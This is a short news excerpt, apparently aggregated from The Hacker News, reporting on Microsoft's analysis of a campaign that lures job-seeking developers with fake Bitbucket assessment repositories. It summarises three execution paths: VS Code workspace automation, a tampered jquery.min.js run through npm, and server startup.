"The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution. The tech giant said the campaign is characterized by the use of multiple entry points that lead to the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to facilitate command-and-control (C2)."
"The attacks rely on the threat actors setting up fake repositories on trusted developer platforms like Bitbucket, using names like "Cryptan-Platform-MVP1" to trick developers looking for jobs into running as part of an assessment process. Further analysis of the identified repositories has uncovered three distinct execution paths that, while triggered in different ways, have the end goal of executing an attacker‑controlled JavaScript directly in memory."
"Visual Studio Code workspace execution, where Microsoft Visual Studio Code (VS Code) projects with workspace automation configuration are used to run malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project. Build‑time execution during application development, where manually running the development server via "npm run dev" is enough to activate the execution of malicious code embedded within modified JavaScript libraries masquerading as jquery.min.js."
Microsoft Defender identified a developer-targeting campaign using malicious repositories disguised as legitimate Next.js projects and technical assessments. Attackers create fake repositories on platforms like Bitbucket with names designed to attract job-seeking developers. The campaign employs three distinct execution paths: VS Code workspace automation that runs malicious code upon project opening, build-time execution triggered by npm commands that fetches payloads from Vercel domains, and server startup execution via environment exfiltration. All paths converge on executing attacker-controlled JavaScript in memory to establish command-and-control access. The campaign leverages job-themed lures to blend into normal developer workflows and increase code execution likelihood.
#developer-targeting-malware #supply-chain-attacks #job-themed-phishing #repository-compromise #command-and-control-infrastructure
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]